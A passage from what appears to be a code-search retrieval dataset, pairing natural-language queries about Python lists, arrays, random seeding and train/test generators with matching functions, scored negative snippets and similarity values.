}
}
|
[
"def numarray(a: list) -> list[float]:\n return [float(aa) for aa in a]",
"def basic_array_creation():\n print('From normal creation')\n arr: pa.Array = pa.array([1, 2, 3, 4, 5], type=pa.int8())\n print(arr)\n\n print('From pandas series')\n arr: pa.Array = pa.Array.from_pandas(pd.Series([1, 2, 3, 4, 5]))\n print(arr)",
"def listarNum(num):\r\n num=str(num)\r\n list_num=np.array([])\r\n for n in num:\r\n n=float(n)\r\n list_num=np.append(list_num, n)\r\n return list_num",
"def n(l):\n return np.array(l,dtype=object)",
"def type_array():\n return []",
"def test_expr_list_array_constructor():\n fcode = \"ACOS(-1.0), SIN(1.0), 1.0+3.0\"\n ast = Fortran2003.Ac_Spec(fcode)\n assert isinstance(ast, Fortran2003.Ac_Value_List)",
"def test_asarraylike_list():\n lst = [1, 2, 3, 4]\n result = util.asarraylike(lst)\n assert isinstance(result, np.ndarray)\n assert np.array_equal(result, lst)",
"def decode(lst, typecode ):\n a = array.array( typecode )\n for n,c in lst: \n a.extend( array.array( typecode, (c,) * n ) )\n return a",
"def make_fp_array(fp_list, shape, name, pos):\n# XXX For some reason I'm unable to track down, sphinx was unhappy about the indentation in the\n# results of the first test in this docstring, so I reworked it to print the two rows of the array\n# separately, and now it's happy again.\n if not shape:\n # note: SyntaxError is in yappsrt.py and gets globbed into our\n # namespace, thus shadowing Python's builtin!\n raise SyntaxError(pos, \"expected a non-empty shape sequence for field %r, got %r\" % (name, shape,))\n from operator import mul\n len_needed = reduce(mul, shape)\n if len_needed != len(fp_list):\n # note: SyntaxError is in yappsrt.py and gets globbed into our\n # namespace, thus shadowing Python's builtin!\n raise SyntaxError(pos, \"expected %d values for field %r, got %d\" % (len_needed, name, len(fp_list)))\n a = array(fp_list, dtype = float)\n a.shape = shape\n return a",
"def to_numpy(a: List[tvm.nd.NDArray]) -> List[np.ndarray]:\n assert a is not None, \"Empty result cannot be converted to numpy\"\n return [x.numpy() for x in a]",
"def as_array(value):\n\tif not isinstance(value, list):\n\t\treturn [value]\n\treturn value",
"def test_cast_list(self):\n dim = Real(\"yolo\", \"uniform\", -3, 4)\n assert dim.cast([\"1\", \"2\"]) == [1.0, 2.0]",
"def array(self):",
"def listoflistToarray(l):\n max_dim=max([len(c) for c in l])\n all_array=[np.pad(c,(0,max_dim-len(c)),\"constant\",constant_values=(0,0)) for c in l]\n return np.array(all_array)",
"def makelist(input):\n if isinstance(input, list) or isinstance(input, np.array):\n output = input\n else:\n output = [input]\n return output",
"def test_make_np_iterable_list(val):\n val_rec = uc._make_np_iterable(val)\n\n assert isinstance(val_rec, np.ndarray)\n assert len(val_rec) == len(val)",
"def create_array( n ):",
"def array (self, length, width):\n\t\treturn [[0 for i in range(width)] for j in range(length)] #List comprehensions (Works like two for loops)",
"def init_one_d_array(len, val):\n return [val for i in range(len)]",
"def __init__(self, initializing_list, typecode) :\r\n global TypeRanges, NumericToArray\r\n array_typecode = NumericToArray[typecode][0]\r\n self.numeric_typecode = typecode\r\n self.impl = array.array(array_typecode)\r\n self.complex = (typecode=='F' or typecode=='D')\r\n for x in initializing_list :\r\n self.append(x)",
"def c_array(ctype, values):\n\n arr = (ctype*len(values))()\n arr[:] = values\n return arr",
"def number_array(cls, scale, num, space, space_series, num_series, \n origin, subsampling, rotation=0, values=None,\n thin=True, text_width=None):\n if values is None:\n nums = range(num)\n else:\n nums = [values[i%len(values)] for i in range(num)] \n \n all_numbers = []\n for i in range(num_series):\n for j in range(num):\n xpos = origin[0]+j*space+i*(space*num+space_series)\n if np.mod(j,subsampling) ==0:\n if thin:\n cur_num = Feature.define_text([xpos,origin[1]],str(nums[j]), scale, rotation, text_width=text_width).coord\n else:\n cur_num = Feature.numbering(nums[j], scale, [xpos,origin[1]],rotation).coord\n for x in cur_num:\n all_numbers.append(x)\n all_numbers_obj = cls()\n all_numbers_obj.coord = all_numbers\n if thin:\n all_numbers_obj.open = True\n all_numbers_obj.text_width = text_width\n return all_numbers_obj",
"def test_cast_array(self):\n dim = Real(\"yolo\", \"uniform\", -3, 4)\n assert np.all(dim.cast(np.array([\"1\", \"2\"])) == np.array([1.0, 2.0]))",
"def m_numeric_array(self, value):\n return '<numeric_array id=\"%s\" encoding=\"base64\">%s</numeric_array>' % \\\n (self.register(value), Numeric.dumps(value).encode('base64'))",
"def test_array_uplift(parser):\n doc = parser.parse(b'[0, 1, 2, 3, 4, 5]')\n assert isinstance(doc, simdjson.Array)\n\n assert doc.as_list() == [0, 1, 2, 3, 4, 5]\n assert isinstance(doc.as_list(), list)",
"def getDoubleArray2D(self) -> typing.List[typing.List[float]]:\n ...",
"def to_ndarray(item):\n \n return type(item), sp.array(item, sp.float64, ndmin=1)",
"def PLCTYPE_ARR_REAL(n: int) -> Type[Array]:\n return c_float * n",
"def numpify(x: Union[List, np.ndarray, torch.Tensor]) -> np.ndarray:\n if isinstance(x, np.ndarray):\n return x\n if isinstance(x, List):\n return np.array(x)\n if isinstance(x, torch.Tensor):\n return x.cpu().numpy()\n raise TypeError(\"Expected input of type List, np.ndarray, or torch.Tensor.\")",
"def test_cast_array(self):\n dim = Integer(\"yolo\", \"uniform\", -3, 5)\n assert np.all(dim.cast(np.array([\"1\", \"2\"])) == np.array([1, 2]))"
] |
[
"0.70484656",
"0.6914373",
"0.6910644",
"0.672295",
"0.6563476",
"0.64376646",
"0.6310567",
"0.6294734",
"0.62499875",
"0.6187154",
"0.6168736",
"0.61499",
"0.61470413",
"0.61454135",
"0.61355835",
"0.61354077",
"0.61266613",
"0.6124175",
"0.61011404",
"0.6092799",
"0.608155",
"0.6078325",
"0.60275453",
"0.60062873",
"0.5992603",
"0.5976059",
"0.59722096",
"0.5944379",
"0.59434557",
"0.59347665"
] |
0.7440226
|
0
|
Creating an empty list and populating it with random values using random.seed() and random.randint()
|
def populate_empty_list():
    from random import randint, seed
    seed(56)
    l = []
    for i in range(100):
        l.append(randint(0, 100))
    print(l[34:56])
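A minimal sketch of why seed(56) appears above: seeding the generator makes the "random" values reproducible across runs (standard library behaviour):

from random import randint, seed

seed(56)
first = [randint(0, 100) for _ in range(5)]
seed(56)
second = [randint(0, 100) for _ in range(5)]
print(first == second)   # True - the same seed reproduces the same sequence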
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_list(self):\n\n\t\trandom_list = random.sample(range(0, 500), 10)\n\n\t\treturn random_list",
"def newList(self):\n lst = []\n count = 0\n while count < 52:\n lst.append(randint(1, 1500))\n count += 1\n return lst",
"def random():\n np.random.seed(1939)",
"def random():\n np.random.seed(0)",
"def generate_list(size):\n items = [randint(0, MAX_NUM) for i in range(size)]\n return items",
"def spinit(list):\n return (random.choice(list))",
"def seed(self, seed=None) -> List[np.ndarray]:\n self.np_random, seed_0 = seeding.np_random(seed)\n seed_1 = seeding.hash_seed(seed_0 + 1) % 2 ** 31\n return [seed_0, seed_1]",
"def _seed(self, seed=None):\n self.rng, seed = seeding.np_random(seed)\n return [seed]",
"def default_values():\r\n start_lists = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]]\r\n start = 0\r\n while start < 2:\r\n inde1 = random.randint(0, 3)\r\n inde2 = random.randint(0, 3)\r\n choice = random.randint(0, 7)\r\n if choice == 0:\r\n if start_lists[inde1][inde2] == 0:\r\n start_lists[inde1][inde2] = 4\r\n else:\r\n if start_lists[inde1][inde2] == 0:\r\n start_lists[inde1][inde2] = 2\r\n start = start + 1\r\n return start_lists",
"def Randomize(seed=None):\n random.seed()",
"def initialize_randomness(seed):",
"def seed():",
"def generate_list(length: int) -> list:\n\n return [randint(0, length + 1) for _ in range(length)]",
"def seed_random():\n random.seed(0)",
"def _seed_population(self):\n return [self._generate_weights() for x in range(self.population_size)]",
"def initialize(self):\n N=self.N\n M=[]\n a=random.rand(self.d,1,self.D)\n M.append(a)\n for i in range(1,N-1):\n a=random.rand(self.d,self.D,self.D)\n M.append(a)\n a=random.rand(self.d,self.D,1)\n M.append(a)\n return M",
"def generator(self, random, args):\r\n if self.duplicates:\r\n max_count = [self.capacity // item[0] for item in self.items]\r\n return [random.randint(0, m) for m in max_count]\r\n else:\r\n return [random.choice([0, 1]) for _ in range(len(self.items))]",
"def seed (self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]",
"def generateRandomList(minval, maxval, size):\n return [random.randint(minval, maxval) for _ in range(size)]",
"def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]",
"def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]",
"def randomize(self):\n \n spins = [np.random.random() > 0.5 for x in range(self.size)]\n self.spins_initial = bitarray.bitarray(spins)",
"def generate_seed():\n global seed\n seed = []\n\n for char_id in range(0, len(printable)):\n while True:\n char_sequence = [printable[randint(0, len(printable)-1)], printable[randint(0, len(printable)-1)]]\n if char_sequence not in seed:\n break\n seed.append(char_sequence)",
"def _initialize_seed(self, seed: Optional[int] = None) -> List[np.uint32]:\n # Generate a sequence of 3 bytes uint32 seeds\n self._seed = list(np.random.SeedSequence(seed).generate_state(3))\n\n # Re-initialize the low-level bit generator based on the provided seed\n self.np_random.bit_generator.state = np.random.SFC64(self._seed).state\n\n # Reset the seed of the action and observation spaces\n self.observation_space.seed(seed)\n self.action_space.seed(seed)\n\n # Reset the seed of Jiminy Engine\n self.simulator.seed(self._seed[0])\n\n return self._seed",
"def getRandomList(n):\n lyst = list()\n for count in range (n):\n lyst.append(random.randint(1, n))\n return lyst",
"def list_gen(value):\n\n sample_list = random.sample(xrange(1, (value + 1)), value)\n return sample_list",
"def shuffle(list_, random_seed=123):\n random.Random(random_seed).shuffle(list_)",
"def seed(self, seed=None):\n self._np_random, seed = seeding.np_random(seed)\n return [seed]",
"def shuffle(self):\n new_list = [] \n while True:\n if len(self.init_nums) == 0 :\n pass\n break\n else: \n while self.init_nums is not None: \n if len(self.init_nums) is 0: \n break\n else :\n ks = random.choice(self.init_nums) \n new_list.append(ks)\n self.init_nums.remove(ks)\n\n if self.orig == new_list:\n continue\n else:\n print(new_list)\n break \n self.init_nums = new_list\n return(new_list)",
"def make_repeatable():\n random.seed(1234)\n np.random.seed(1234)"
] |
[
"0.73266876",
"0.7185752",
"0.68597156",
"0.6845599",
"0.68304396",
"0.68276584",
"0.68155515",
"0.68108755",
"0.6799451",
"0.67544883",
"0.6745315",
"0.674205",
"0.66945124",
"0.66901034",
"0.66744536",
"0.6666645",
"0.6641088",
"0.66403663",
"0.66161585",
"0.66082114",
"0.66082114",
"0.65786713",
"0.65664196",
"0.65544605",
"0.65276456",
"0.65251124",
"0.6488394",
"0.64851135",
"0.6463901",
"0.6461123"
] |
0.7981575
|
0
|
Showing examples of list comprehension: list comprehension over an array.array(); list comprehension over a list of strings; list comprehension with enumerate(), to find indices of all occurrences of an element in a list. Using str() and join() in printing results.
|
def demonstrate_list_comprehension():
    from array import array
    a = array('i', [4, 2, 8, 9])
    l = [i for i in a]
    print(l)
    l = [str(i) for i in a]
    print(l)
    print()
    john = ['John', 'Lennon', 'Liverpool']
    l = [s for s in john]
    print(l)
    print(', '.join(s for s in john))
    print(', '.join(john))
    print()
    songs = ['Imagine a Man', 'There\'s a Place', 'No Expectations', 'Heaven is a Place on Earth']
    first_words = [words[0] for words in [title.split() for title in songs]]
    print(first_words)
    print(' '.join(first_words))
    lyric = [first_words[0]] + [word.lower() for word in first_words[1:]]
    print(' '.join(lyric))
    print()
    songs = ['No Expectations', 'Imagine a Man', 'There\'s a Place', 'No Expectations', 'Heaven is a Place on Earth',
             'No Expectations', 'No Expectations', ]
    print([i for i, k in enumerate(songs) if k == 'No Expectations'])
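The enumerate() idiom in the last line generalises to a small helper; a sketch (the function name is illustrative, not from the source):

def indices_of(item, seq):
    # All positions at which item occurs in seq.
    return [i for i, value in enumerate(seq) if value == item]

print(indices_of('No Expectations',
                 ['No Expectations', 'Imagine a Man', 'No Expectations']))   # [0, 2]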
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _pick_elements(self,regexp_ind,array_list):\r\n new_array_list = [] #New list with elements matching regexp_ind\r\n array_indices = [] #Indices that matches the arrays in new_array_list and array_list\r\n\r\n array_index = 0\r\n for array in array_list:\r\n _new = []\r\n for ai in array:\r\n if ai in regexp_ind:\r\n _new.append(ai)\r\n if len(_new):\r\n new_array_list.append(np.array(_new))\r\n array_indices.append(array_index)\r\n array_index += 1\r\n return new_array_list, array_indices",
"def matchloc(alist,val): \n return [ilc for ilc,jlc in enumerate(alist) if jlc==val]",
"def parameter_finder(target_list, search_list, msgflag=False, exact=False):\n target_list = [x.lower() for x in target_list]\n\n indexes = []\n\n if isinstance(search_list, str):\n cont = 0\n search_list = search_list.lower()\n for t in target_list:\n if exact == False and search_list in t:\n indexes.append(cont)\n elif exact == True and search_list == t:\n indexes.append(cont)\n cont += 1\n if isinstance(search_list, list):\n search_list = [x.lower() for x in search_list]\n\n for s in search_list:\n s = str(s)\n for cont, t in enumerate(target_list):\n if exact == False and s in t:\n print((s, t))\n indexes.append(cont)\n elif exact == True and s == t:\n print((s, t))\n indexes.append(cont)\n\n if msgflag == True:\n length = len(indexes)\n if length > 1: print(\"There were several ocurrences\")\n if length == 0: print(\"No ocurrences found\")\n\n return indexes",
"def occurence(main_seq,sub_seq):\n start= 0\n indices =[]\n while True:\n start = main_seq.find(sub_seq,start)\n if start > 0:\n indices.append(start)\n else:\n break\n start +=1\n return indices",
"def print_search(search_result: list):\n\n for i, element in enumerate(search_result):\n print(f\"{i} = {element[1]}\")",
"def print_list_index(iterable_item):\n if str(type(iterable_item)) == \"<class 'str'>\":\n characters = list(iterable_item)\n for i in enumerate(characters):\n print(characters[i], \":\", i)\n if str(type(iterable_item)) == \"<class 'list'>\":\n for i in enumerate(iterable_item):\n print(iterable_item[i], \":\", i)",
"def test_enumerate_list(self) -> None:\n self.assertEqual(list(my_enumerate('Janki Patel')), list(enumerate('Janki Patel')))\n \"\"\"test that in one side it has janki patel but in another side it has blank string so this is not equla function\"\"\"\n self.assertNotEqual(list(my_enumerate('Janki Patel')), list(enumerate('')))\n self.assertNotEqual(list(my_enumerate('Janki')), list(enumerate('Janak')))",
"def findall(l, o):\n return [i for i, u in enumerate(l) if u==o]",
"def my_index(list_, element):\n pos = []\n for i in range(len(list_)):\n if list_[i] == element:\n pos.append(i)\n return pos",
"def make_indexed_list(x_iter):\n return [\"{} {}\".format(bracket_pad_num(i + 1, len(x_iter)), x_iter[i]) for i in range(len(x_iter))]",
"def test_list_occurrences(self):\n pass",
"def py_enumerate_list_index_target():\n target = [None]\n for target[0],k in enumerate(range(1,5)):\n print(target, k)",
"def indexAll(inputList=None, value=None):\r\n if not isinstance(inputList, list):\r\n raise TypeError('Input list must be a list object.')\r\n return [i for i, x in enumerate(inputList) if x == value]",
"def indexer(list1, list2):\r\n\tindex_list = []\r\n\tfor x in list2:\r\n\t\tfor y in list1:\r\n\t\t\tif x == y:\r\n\t\t\t\tindex = list1.index(x)\r\n\t\t\t\tindex_list.append(index)\r\n\treturn index_list",
"def occ_indices(self):\n indices = []\n for index,item in enumerate(self):\n if item==1:\n indices.append(index)\n return indices",
"def test_search_list_found(self):\r\n self.assertEqual(search_array([6, 4, 9, 10], 9), 2)",
"def check_strings_occ(data: np.ndarray, idx: int, threshold: int):\n [arr, count] = np.unique(data[:, idx], return_counts=True)\n print(list(arr[np.where(count < threshold)]))\n print((arr[np.where(count < threshold)].shape[0]))\n print(list(zip(list(arr[np.where(count > threshold)]), list(count[np.where(count > threshold)]))))\n print(list(zip(list(arr[np.where(count < threshold)]), list(count[np.where(count < threshold)]))))",
"def get_indexes(from_list, find_list):\n\n df_find = pd.DataFrame(find_list, columns=['value'])\n df_from = pd.DataFrame(list(zip(from_list, np.arange(len(from_list)))), columns=['value', 'index'])\n indexes = pd.merge(df_from, df_find, on='value', how='inner')['index'].values\n return indexes",
"def list_item_indexes(list_arg: list, item: Any) -> Tuple[int, ...]:\n indexes = [index for index, value in enumerate(list_arg) if value == item]\n return indexes",
"def get_coincidence_indices(self, lst, element):\n result = []\n offset = -1\n while True:\n try:\n offset = lst.index(element, offset+1)\n except ValueError:\n return result\n result.append(offset)",
"def element_list(species):\n counter = Counter(species)\n elementlist = []\n for x in counter:\n elementlist.append([str(x), counter[x]])\n return elementlist",
"def enumerate_list(seq):\n return zip(xrange(len(seq)), seq)",
"def list_to_idx(lst, typecode):\n magicnumber = _build_magic_number(lst, typecode)\n dimension_sizes = _build_dimension_sizes(lst)\n data = _build_data(lst, typecode)\n\n return magicnumber + dimension_sizes + data",
"def test_search_sequence_numpy():\n arr = np.array(list('abcbdababz'))\n seq = np.array([list('ab')])\n np.testing.assert_equal(search_sequence_numpy(arr, seq), np.array([0, 1, 5, 6, 7, 8]))",
"def get_positions(token, docs):\n\n all_matches = [token]\n for doc in docs:\n matches = []\n if token in doc:\n indexes = [i for i, x in enumerate(doc) if x == token]\n matches += [docs.index(doc), len(indexes), indexes]\n if matches:\n all_matches.append(matches)\n return all_matches",
"def display_word_status(word, indexes_found):\n status = []\n for i in range(len(word)):\n if i in indexes_found:\n status.append(word[i])\n else:\n status.append('_')\n print('\\n[', \" \".join(status), '] \\n')",
"def _get_indices(input_items, wanted_items):\r\n # Note: Some of this code is taken from Jeremy Widmann's\r\n # get_valid_indices() function, part of make_distance_histograms.py from QIIME 1.8.0.\r\n try:\r\n iter(input_items)\r\n except:\r\n raise ValueError(\"The input_items to search must be iterable.\")\r\n try:\r\n len(wanted_items)\r\n except:\r\n # We have a scalar value, so put it in a list.\r\n wanted_items = [wanted_items]\r\n if isinstance(wanted_items, basestring):\r\n wanted_items = [wanted_items]\r\n\r\n return [input_items.index(item)\r\n for item in wanted_items if item in input_items]",
"def _index_symbols(symbols):\n symbol_start_indices = []\n next_start_index = 0\n for symbol in symbols:\n entry_count = count_entries(symbol)\n if entry_count > EXAMPLE_SIZE:\n symbol_start_indices.append(next_start_index)\n next_start_index += entry_count - EXAMPLE_SIZE\n total_examples = next_start_index\n return symbol_start_indices, total_examples",
"def findings_2_idx(findings, corner_2_idx, funcx, funcy):\n idx = []\n for finding in findings:\n x, y = finding\n mesh = np.array(np.meshgrid(funcx(x), funcy(y))).swapaxes(1,2).reshape(2,-1).T\n idx.extend([corner_2_idx(c) for c in mesh])\n\n return np.unique(idx)",
"def indices(lst, element):\n result = []\n offset = -1\n while True:\n try:\n offset = lst.index(element, offset + 1)\n except ValueError:\n return result\n result.append(offset)"
] |
[
"0.59395385",
"0.5903913",
"0.5900641",
"0.5863628",
"0.5819813",
"0.5662459",
"0.5627906",
"0.5608562",
"0.55847615",
"0.5488613",
"0.5387361",
"0.53513455",
"0.531568",
"0.53117836",
"0.52748054",
"0.52639985",
"0.5258652",
"0.52479535",
"0.5230476",
"0.52175987",
"0.5175117",
"0.51727045",
"0.5166379",
"0.5135677",
"0.5132145",
"0.51178753",
"0.5108375",
"0.51082987",
"0.50986123",
"0.5063118"
] |
0.65372443
|
0
|
Yields document and labels concurrently
|
def train(self):
    for doc, label in zip(self.train_docs(), self.train_labels()):
        yield doc, label
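A minimal, self-contained sketch of how the generator pairs the two streams; the Corpus class below is a stand-in for whatever object defines train_docs() and train_labels() in the source, not the original class:

class Corpus:
    def train_docs(self):
        return ['first document', 'second document']

    def train_labels(self):
        return ['pos', 'neg']

    def train(self):
        # zip() lazily pairs the i-th document with the i-th label
        for doc, label in zip(self.train_docs(), self.train_labels()):
            yield doc, label

for doc, label in Corpus().train():
    print(label, doc)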
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def iter_documents(self):\n raise NotImplementedError",
"def __iter__(self):\r\n for text in self.get_texts():\r\n yield self.dictionary.doc2bow(text, allow_update=False)",
"def _doc2vec_doc_stream(paths, n, tokenizer=word_tokenize, sentences=True):\n i = 0\n p = Progress()\n for path in paths:\n with open(path, 'r') as f:\n for line in f:\n i += 1\n p.print_progress(i/n)\n\n # We do minimal pre-processing here so the model can learn\n # punctuation\n line = line.lower()\n\n if sentences:\n for sent in sent_tokenize(line):\n tokens = tokenizer(sent)\n yield LabeledSentence(tokens, ['SENT_{}'.format(i)])\n else:\n tokens = tokenizer(line)\n yield LabeledSentence(tokens, ['SENT_{}'.format(i)])",
"def test(self):\n for doc, label in zip(self.test_docs(), self.test_labels()):\n yield doc, label",
"def parse_documents():\n\n\tcount_before = control.find().count()\n\n\tprint \"There are currently %i unprocessed records.\" % count_before\n\n\t#dispatch\n\t# executor = concurrent.futures.ThreadPoolExecutor(10)\n\t# futures = [executor.submit(analyze_message, document) for document in control.find()]\n\t# concurrent.futures.wait(futures)\n\n\tfor document in control.find():\n\t\tanalyze_message(document)\n\n\tcount_after = control.count()\n\tprint \"There are now %i stored records.\" % control.count()",
"def __iter__(self):\n for tokens in iter_documents(self.top_dir, self.types, self.sheets, self.np, self.ngrams):\n # transform tokens (strings) into a sparse vector, one at a time\n yield self.dictionary.doc2bow(tokens)",
"def __iter__(self):\n for tokens in readbook(self.path, self.ngrams):\n # transform tokens (strings) into a sparse vector, one at a time\n yield self.dictionary.doc2bow(tokens)",
"def __iter__(self):\n for this_document in self.documents:\n yield this_document",
"def multiple_document_processing(self) -> List:\n batch_list = []\n for doc, idx in self.__documents:\n entities_idx = {'idx': idx}\n entities_result = self.create_entity(document=doc)\n word_cleaned = self.clean_words(doc)\n entities_idx[self.key_spacy_text] = str(word_cleaned)\n entities_idx.update(entities_result)\n batch_list.append(entities_idx)\n return batch_list",
"def structure_PBDMS_annotations(documents, kb_data):\n \n doc_annotations = list()\n partial_func = partial(parse_PBDMS_doc, kb_data)\n \n with multiprocessing.Pool(processes=10) as pool:\n doc_annotations = pool.map(partial_func, documents)\n \n return doc_annotations",
"def __iter__(self):\n for p in self.paths:\n yield Document.load(os.path.join(self.dirpath, p), fmt=self.fmt)",
"def __iter__(self):\n for tokens in iter_folder(self.top_dir, self.ngrams):\n # transform tokens (strings) into a sparse vector, one at a time\n yield self.dictionary.doc2bow(tokens)",
"def learn(self, documents, labels):\n for i in xrange(len(documents)):\n text = documents[i]\n\n words = text.split()\n self.learn_from_one(words)",
"def annotate_documents(asynch=False):\n \n files = glob.glob(os.path.join(cfg.INPUT_PATH, cfg.INPUT_PATTERN))\n logger.info('found %d files with pattern %s', len(files), cfg.INPUT_PATTERN) \n \n if asynch:\n with concurrent.futures.ThreadPoolExecutor(max_workers=cfg.ASYNCH_MAX_WORKERS) as executor:\n executor.map(annotate_one, files)\n \n else: \n for f_json in files:\n annotate_one(f_json)\n \n \n return",
"def run(self, mapping={}, *args, **kwargs):\n self.processed = 0\n for batch in self._process_by_batch(self.load(*args, **kwargs)):\n batch = list(map(lambda doc: self._apply_mapping(doc, mapping), batch))\n for doc in batch:\n self._ingest(iterable=doc, doctype=doc[\"doctype\"])\n self.processed += 1\n logger.info(\"Added {} documents to the database.\".format(self.processed))",
"def train__iter__(self):\n\n # create worker-specific random number generator\n rng = create_rng_for_worker(self.model.current_epoch)\n\n while True:\n\n # select one file at random (with probability proportional to its annotated duration)\n file, *_ = rng.choices(\n self._train,\n weights=[f[\"duration\"] for f in self._train],\n k=1,\n )\n\n # select one annotated region at random (with probability proportional to its duration)\n segment, *_ = rng.choices(\n file[\"annotated\"],\n weights=[s.duration for s in file[\"annotated\"]],\n k=1,\n )\n\n # select one chunk at random (with uniform distribution)\n start_time = rng.uniform(segment.start, segment.end - self.duration)\n chunk = Segment(start_time, start_time + self.duration)\n\n X, one_hot_y, _ = self.prepare_chunk(file, chunk, duration=self.duration)\n\n y = self.prepare_y(one_hot_y)\n\n yield {\"X\": X, \"y\": y}",
"def generate_labels(cfg, split_files):\n for file_name in split_files:\n file_name = join(cfg.data_dir, file_name)\n\n for example in generate_examples(file_name):\n yield from example['labels']",
"def process(self):\r\n\r\n index = cindex.Index.create()\r\n self.headers = {}\r\n\r\n for f in self.files:\r\n if f in self.processed:\r\n continue\r\n\r\n print \"Processing `%s'\" % (os.path.basename(f),)\r\n\r\n tu = index.parse(f, self.flags)\r\n\r\n if len(tu.diagnostics) != 0:\r\n fatal = False\r\n\r\n for d in tu.diagnostics:\r\n sys.stderr.write(d.format)\r\n sys.stderr.write(\"\\n\")\r\n\r\n if d.severity == cindex.Diagnostic.Fatal or \\\r\n d.severity == cindex.Diagnostic.Error:\r\n fatal = True\r\n\r\n if fatal:\r\n sys.stderr.write(\"\\nCould not generate documentation due to parser errors\\n\")\r\n sys.exit(1)\r\n\r\n if not tu:\r\n sys.stderr.write(\"Could not parse file %s...\\n\" % (f,))\r\n sys.exit(1)\r\n\r\n # Extract comments from files and included files that we are\r\n # supposed to inspect\r\n extractfiles = [f]\r\n\r\n for inc in tu.get_includes():\r\n filename = str(inc.include)\r\n self.headers[filename] = True\r\n\r\n if filename in self.processed or (not filename in self.files) or filename in extractfiles:\r\n continue\r\n\r\n extractfiles.append(filename)\r\n\r\n for e in extractfiles:\r\n db = comment.CommentsDatabase(e, tu)\r\n\r\n self.add_categories(db.category_names)\r\n self.commentsdbs[e] = db\r\n\r\n self.visit(tu.cursor.get_children())\r\n\r\n for f in self.processing:\r\n self.processed[f] = True\r\n\r\n self.processing = {}\r\n\r\n # Construct hierarchy of nodes.\r\n for node in self.all_nodes:\r\n q = node.qid\r\n\r\n if node.parent is None:\r\n par = self.find_parent(node)\r\n\r\n # Lookup categories for things in the root\r\n if (par is None or par == self.root) and (not node.cursor is None):\r\n location = node.cursor.extent.start\r\n db = self.commentsdbs[location.file.name]\r\n\r\n if db:\r\n par = self.category_to_node[db.lookup_category(location)]\r\n\r\n if par is None:\r\n par = self.root\r\n\r\n par.append(node)\r\n\r\n # Resolve comment\r\n cm = self.find_node_comment(node)\r\n\r\n if cm:\r\n node.merge_comment(cm)\r\n\r\n # Keep track of classes to resolve bases and subclasses\r\n classes = {}\r\n\r\n # Map final qid to node\r\n for node in self.all_nodes:\r\n q = node.qid\r\n self.qid_to_node[q] = node\r\n\r\n if isinstance(node, nodes.Class):\r\n classes[q] = node\r\n\r\n # Resolve bases and subclasses\r\n for qid in classes:\r\n classes[qid].resolve_bases(classes)\r\n\r\n self.markup_code(index)",
"def preprocess_docs():\n\n print(\"Getting started!\")\n stopwords.populate_stopwords(NLP, STOPWORD_URL)\n\n print(str.format(\"Using data dir:{}\", DATA_DIR))\n\n csv_file = open(os.path.join(DATA_DIR, 'PDFs.csv'))\n reader = csv.reader(csv_file, 'excel')\n rows = list(reader)\n\n filenames = [_get_filename(row) for row in rows]\n\n pool = Pool(multiprocessing.cpu_count())\n\n try:\n pool.map(_get_item, rows)\n pool.map(pdf.extract_text, filenames)\n docs = pool.map(_extract_questions, rows)\n docs = [d for d in docs if d is not None]\n\n _find_similar(docs, simdoc=compare.compare_doc_keywords)\n\n for doc in docs:\n if doc is None:\n continue\n doc.save_json()\n\n except KeyboardInterrupt:\n pool.terminate()\n print(\"You cancelled the program!\")\n sys.exit(1)\n\n print(\"Done\")",
"def main():\n global collection\n #args = argparse.ArgumentParser()\n #args.add_argument('directory', help='Directory in which the files'\n #'are stored.')\n #args.add_argument('collection', help='The collection to use.')\n #parser = args.parse_args()\n collection = get_collection()\n #documents = glob.glob('*.asm')\n documents = collection.find()\n num_cores = multiprocessing.cpu_count()\n print('Running code on %d processors' % num_cores)\n Parallel(n_jobs=num_cores)(\\\n delayed(save_comments)(doc) for doc in documents)",
"def bulk_process(self):\n\n def actions():\n try:\n task = self.queue.get(block=False, timeout=None)\n\n if task['action'] == 'index':\n yield {\n '_op_type': 'index',\n '_index': self.ensure_index(task),\n '_id': task['id'],\n 'doc': task['properties']\n }\n elif task['action'] == 'delete':\n yield {\n '_op_type': 'delete',\n '_index': self.ensure_index(task),\n '_id': task['id'],\n 'doc': task['properties']\n }\n else:\n raise NotImplementedError\n\n except Empty:\n pass\n\n for success, info in streaming_bulk(self.es_client, actions()):\n if success:\n self.queue.task_done()",
"def batch(dir_path: str):\n for file_name in os.listdir(dir_path):\n clf_str = get_clf_from_file_name(file_name)\n if clf_str:\n print('start get keywords text rank of file {}'.format(file_name))\n file_path = os.path.join(dir_path, file_name)\n docs_json = json.dumps(get_json(file_path))\n # note that the docs json pass to pandas.read_json() function must be type of json string,\n # never pass a json obj to it!\n clf_data = pd.read_json(docs_json, encoding='utf-8')\n yield (clf_str, get_keywords_text_rank(clf_data, 10))",
"def iter_documents(input_file, transformer, positive_class=None): \n for index, row in enumerate(csv.reader(open(input_file))):\n title = row[1]\n description = row[2]\n tags = row[3].split(' ')\n \n if positive_class is None:\n output = tags\n else:\n output = int(positive_class in tags)\n\n if input_file in [CULLED_TRAIN_FILE, TRAIN_FILE] and index == 50000:\n break\n if input_file == TEST_FILE and index == 400:\n break\n\n yield (transformer.transform([title]), transformer.transform([description]), output)",
"def next(self):\n\t\t# keep looping until we reach our batch size\n\t\twhile True:\n\t\t\tret = self.get_batch()\n\t\t\tself.index += self.batch_size\n\t\t\tif self.index >= len(self.texts) - self.batch_size:\n\t\t\t\tself.index = 0\n\t\t\tyield ret",
"def inner_generator():\n # A buffer where observed query-document features will be stored.\n # It is a list of dictionaries, one per query-document pair, where\n # each dictionary is a mapping from a feature ID to a feature value.\n for p in processed:\n yield p",
"def __iter__(self):\n while True:\n if self.batches is None:\n for indexed_sentence in self.indexed_sentences:\n yield indexed_sentence\n else:\n for batch in self.batches:\n yield batch[:-1, :], batch[1:, :] # Return batch and target indices\n\n if not self.repeat:\n return",
"def __iter__(self):\n for hit in self._evaluate()['hits']['hits']:\n yield self._to_document(hit)",
